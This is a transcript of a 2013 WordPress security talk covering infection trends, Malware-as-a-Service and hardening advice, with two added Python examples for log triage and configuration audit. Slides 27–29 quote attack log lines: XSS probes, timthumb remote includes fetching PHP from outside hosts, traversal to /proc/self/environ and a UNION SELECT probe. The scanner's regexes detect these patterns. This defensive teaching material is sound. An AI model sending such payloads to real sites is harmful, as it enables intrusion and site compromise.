WordPress Website Security - Trends, Threats, Defenses
Transcript

  • 1. WordPress Website Security
  • 2. Expertise: None. Specialization: Website Security, Incident Handling, Log Analysis. Special Interests: Warfare, Weapons, Martial Arts. (Footer on every slide: 4/4/2013 Tony Perez | @perezbox | @sucuri_security | #WCMIA)
  • 3. Website Security Company; Global Operations; All Website Platforms; Scan 1M Unique Domains a Month; Block 1M Web Attacks a Month; 300 – 500 Websites a Day; Signature / Heuristic Based; 24/5 - 18/2 Operations
  • 4. Trends. Threats. Defenses. SIMPLE RIGHT?
  • 6. Chart: Malicious Links, 2011 vs 2012
  • 8. Chart: Known Malware vs Unknown Malware
  • 9. Chart: Not Infected vs Infected
  • 10. Chart: infection types by share. Shares: 26%, 19%, 16%, 14%, 11%, 10%, 4%. Categories: Remote iFrame Includes, Remote SPAM Includes, Obfuscated / Conditional JavaScript, Defacements, Other, JavaScript Injections, Encoded Redirects
  • 11. Going deeper than the application layer, targeting the server. Server polymorphism (a.k.a. it changes a lot). Diagram: Email, Apache, SSH, Server
  • 12. Stick with reputable sources (Gravity Forms, JetPack Forms). Rogue forms end up generating SPAM emails, hogging resources, and getting the IP blacklisted.
  • 14. Pharmacy; Payday Loans
  • 15. Access – so easy, yet so weak. Widgets too…
  • 16. Diagram: Site 1, Site 2, Site 3, Site 4
  • 22. Explosion in the Malware as a Service (MaaS) trade. Yes, pay someone to hack for you. Different tools to break in and generate payloads: brute force and vulnerability exploits; malware payloads. Blackhole Exploit Kit – today’s market leader (2013 – SophosLabs)
  • 26. What kind of website do you have? Use for malware? Burrow into network? Steal data?
  • 27. Stored; Reflective. Sample log lines:
      38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
      123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
  • 28. Sample log lines:
      [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
      83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
      82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
  • 29. Sample log line:
      62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
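As an added example (not from the deck), a small Python triage script that parses Apache combined-format lines like the ones on slides 27 to 29 and flags the request patterns they show: encoded script/onerror probes, timthumb-style remote includes, traversal towards /proc/self/environ, and union-select strings. The log lines inside it are constructed samples using documentation IP ranges; the rule names and regexes are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (documentation IPs), modelled on the slides' patterns.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%281%29+%2F%3E HTTP/1.1" 404 268 "-" "Mozilla/5.0"
192.0.2.11 - - [02/Apr/2013:00:32:58 -0400] "GET /wp-content/themes/example/timthumb.php?src=http%3A%2F%2Fexample.invalid%2Fx.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"
192.0.2.12 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"
192.0.2.13 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"
192.0.2.14 - - [03/Apr/2013:05:25:01 -0400] "GET /wp-content/uploads/2013/04/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Signature-style rules matching what the slides' samples show, applied after decoding.
RULES = {
    "xss": re.compile(r"<script|onerror\s*=|javascript:", re.I),
    "timthumb_rfi": re.compile(r"(timthumb|thumb)\.php\?.*src=https?://", re.I),
    "traversal_lfi": re.compile(r"(\.\./){2,}|/proc/self/environ", re.I),
    "sqli": re.compile(r"union\s+select", re.I),
}

def decode_target(target, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised as well."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_log(text):
    """Return one dict per suspicious line: source ip, status, matched rule, decoded target."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on junk
        ip, _ts, _method, target, status, _size = m.groups()
        decoded = decode_target(target)
        for name, rule in RULES.items():
            if rule.search(decoded):
                hits.append({"ip": ip, "status": int(status), "rule": name, "target": decoded})
                break  # one verdict per line is enough for triage
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ip']:<12} {h['status']} {h['rule']:<14} {h['target']}")
```

A 200 status next to a timthumb or union-select hit is the line worth looking at first, since it means the request was served rather than rejected.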
  • 32. Brand Reputation; Legal Implications; Impact to Sales; Blacklisted by Search Engines; Blacklisted by Payment Processors; Worst Day of Your Life
  • 35. Access Control; Vulnerabilities; Hosting; Online Habits; Social Media; Passwords
  • 36. “It’s about risk reduction… risk will never be zero…”
  • 37. We run on WordPress (current version, of course). Sucuri properties suffer ~125,000 web-based attacks a month on average, ~4,000 attacks a day (this spikes on occasion). That doesn’t include server-level attacks. All flavors of attacks.
  • 38. Instead of telling you what you need to do, I’ll just tell you what we do. Our philosophy and approach is very simple: complex things break in complex ways. We focus on the areas that we can immediately control. We believe in layered defenses.
  • 39. IP Whitelisting; Two-Factor Authentication; Strong / Unique Password; Web Application Firewall; Log Everything
  • 40. Stay Current; Use Trusted Sources; Avoid Soup Kitchen Servers; Web Application Firewall; Log Everything
  • 41. IP Whitelisting; Server Isolation; Public Key Authentication; Host Intrusion Detection System (HIDS); Log Everything
  • 42. Category | Tool | Type
      Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service
      Prevention – Access Control | Sucuri CloudProxy | Service
      Detection | Sucuri Monitoring | Service
      Remediation | Sucuri | Service
      Password Management | 1Password / LastPass | Application
      Host-based Intrusion Detection System | OSSEC | Application
      Access Control Enforcement | Login Secure Solutions | Plugin
      Two-Factor Authentication | Google Authenticator | Plugin
      Application Auditing | Sucuri Premium | Plugin
      Backups | VaultPress | Plugin
  • 43. Category | Location | Type
      Disable Theme / Plugin Editor | wp-config.php | Preventive measure
      Disable PHP execution | .htaccess – uploads / images / wp-includes / etc. | Preventive measure
      Permissions | Directories 755 / Files 644 | Preventive measure
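An added example, not part of the deck: a Python audit that checks a WordPress site root against the three rows of the table above (the DISALLOW_FILE_EDIT constant in wp-config.php, a PHP-denying .htaccess under wp-content/uploads, and 755/644 permissions), run against a constructed throwaway tree in both its weak and hardened state. The .htaccess rule uses Apache 2.2 `Deny from all` syntax, an assumption matching the deck's era; the check names are this example's own.

```python
import re
import stat
import tempfile
from pathlib import Path

# Apache 2.2 syntax (assumed, matching the deck's era): refuse to serve any .php under uploads.
UPLOADS_HTACCESS = "<Files *.php>\n    Deny from all\n</Files>\n"
# The wp-config.php constant that removes the theme/plugin editor from the dashboard.
DISALLOW_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

def audit(site_root):
    """Check a site root against the three table rows; returns {check: result}."""
    root = Path(site_root)
    results = {}
    cfg = root / "wp-config.php"
    results["editor_disabled"] = cfg.is_file() and bool(DISALLOW_RE.search(cfg.read_text()))
    ht = root / "wp-content" / "uploads" / ".htaccess"
    results["uploads_php_blocked"] = ht.is_file() and "Deny from all" in ht.read_text()
    bad = []  # paths whose mode is not 755 (directories) / 644 (files)
    for p in root.rglob("*"):
        mode = stat.S_IMODE(p.stat().st_mode)
        if mode != (0o755 if p.is_dir() else 0o644):
            bad.append(f"{p.relative_to(root)}:{mode:o}")
    results["permissions_ok"] = not bad
    results["permission_violations"] = bad
    return results

def build_demo_site(hardened):
    """Constructed throwaway WordPress-like tree; hardened=False leaves the weak state."""
    root = Path(tempfile.mkdtemp())
    uploads = root / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    (uploads / "photo.jpg").write_bytes(b"\xff\xd8")
    config = "<?php\n" + ("define('DISALLOW_FILE_EDIT', true);\n" if hardened else "")
    (root / "wp-config.php").write_text(config)
    if hardened:
        (uploads / ".htaccess").write_text(UPLOADS_HTACCESS)
    for p in list(root.rglob("*")):
        if hardened:
            p.chmod(0o755 if p.is_dir() else 0o644)
        else:
            p.chmod(0o777 if p.is_dir() else 0o666)  # world-writable, the classic bad state
    return root

if __name__ == "__main__":
    for state in (False, True):
        print("hardened" if state else "weak", audit(build_demo_site(state)))
```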
  • 44. Name | Link
      Sucuri Blog | http://blog.sucuri.net
      Sucuri TV | http://sucuri.tv
      WordPress Forum – Hacked | http://wordpress.org/tags/hacked
      WordPress Forum – Malware | http://wordpress.org/tags/malware
      Badware Busters | https://badwarebusters.org
      Perishable Press | http://perishablepress.com/category/web-design/security/
      Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
      WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress
      Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
      Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress
      Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31